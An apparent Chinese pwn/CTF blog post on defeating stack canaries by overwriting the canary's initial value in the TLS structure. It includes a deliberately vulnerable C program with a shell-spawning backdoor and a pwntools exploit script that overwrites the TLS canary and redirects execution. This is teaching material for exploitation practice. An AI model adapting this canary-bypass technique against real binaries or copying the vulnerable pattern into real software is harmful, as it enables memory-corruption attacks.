Canary--劫持tls上的canary

Chiu Lv4
  2024-07-31 13:57:37 2024-07-31 13:57:37 Created   2024-07-31 13:58:09 2024-07-31 13:58:09 Updated    

覆盖 canary 初始值

linux 下 fs 寄存器指向当前栈的 TLS 结构,fs:0x28 指向的是 TLS 结构中的 stack_guard 值,如果可以覆盖位于 TLS 中的 canary 初始值就可以绕过 canary 保护。

示例程序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#include<stdio.h>
#include<string.h>
#include <unistd.h>
#include <stdlib.h>
 
void backdoor() {
    puts("this is backdoor.");
    system("/bin/sh");
}
 
void vuln() {
    char *heapbuf = malloc(0x80000);
    char stackbuf[0x100];
    size_t offset, length;
    puts("offset:");
    scanf("%zd", &offset);
    puts("length:");
    scanf("%zd", &length);
    puts("heapbuf:");
    read(0, heapbuf + offset, length);
    puts("stackbuf:");
    read(0, stackbuf, 0x200);
}
 
int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
 
    vuln();
 
    return 0;
}
 
// gcc pwn.c -o pwn -no-pie -g

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
 
elf = ELF("./pwn")
context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'
p = process([elf.path])
# gdb.attach(p, "b *0x4012c5\nc")
# pause()
p.sendlineafter("offset:", str(0x274558))
p.sendlineafter("length:", str(8))
 
p.sendafter("heapbuf:", 'b' * 8)
 
payload = "a" * 0x108
payload += 'b' * 8  # canary
payload += 'c' * 8  # rbp
payload += p64(elf.search(asm('ret'), executable=True).next())
payload += p64(elf.sym['backdoor'])
p.sendafter("stackbuf:", payload)
 
p.interactive()
  • Title: Canary--劫持tls上的canary
  • Author: Chiu
  • Created at : 2024-07-31 13:57:37
  • Updated at : 2024-07-31 13:58:09
  • Link: https://github.com/Idealist17/github.io/2024/07/31/Canary-劫持tls上的canary/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
Canary--劫持tls上的canary
  1. 覆盖 canary 初始值